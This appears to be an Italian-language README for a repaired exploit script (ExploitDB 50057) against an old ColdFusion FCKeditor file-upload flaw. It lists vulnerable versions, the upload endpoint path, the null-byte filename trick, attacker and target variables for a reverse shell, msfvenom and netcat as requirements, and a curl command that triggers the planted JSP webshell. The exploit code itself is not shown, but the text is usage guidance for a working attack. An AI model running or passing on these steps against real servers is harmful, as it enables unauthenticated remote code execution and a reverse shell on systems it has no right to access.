
correzione per lo script di exploit non funzionante su exploitdb (50057.py)
Esecuzione remota di codice non autenticata tramite upload arbitrario di file nel componente FCKeditor incluso in ColdFusion. L'endpoint di upload dei file accetta un'iniezione con byte nullo nel parametro filename, consentendo il caricamento e l'esecuzione diretta di una webshell JSP da parte del server.
| Versione | Stato |
|---|
| ColdFusion 8.0 | Vulnerabile |
| ColdFusion 8.0.1 | Vulnerabile |
| ColdFusion 9.0 | Vulnerabile* |
| ColdFusion MX 6.x | Vulnerabile |
| ColdFusion MX 7.x | Vulnerabile |
| ColdFusion 9.0.1+ | Corretta |
| ColdFusion 10+ | Non affetta |
*ColdFusion 9.0 vulnerabile se il componente FCKeditor non è stato rimosso/aggiornato.
Patch: Adobe Security Bulletin APSB09-09 (luglio 2009).
Modificare le variabili all'inizio dello script:
lhost = 'YOUR_IP'
lport = 4444
rhost = 'TARGET_IP'
rport = 8500
Eseguire:
python3 poc.py
Lo script:
Se la shell non arriva entro pochi secondi, attivarla manualmente:
curl http://<rhost>:<rport>/userfiles/file/<filename>.jsp
Il nome del file viene stampato su stdout dopo l'upload.
msfvenom
netcat (nc)
python3
/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm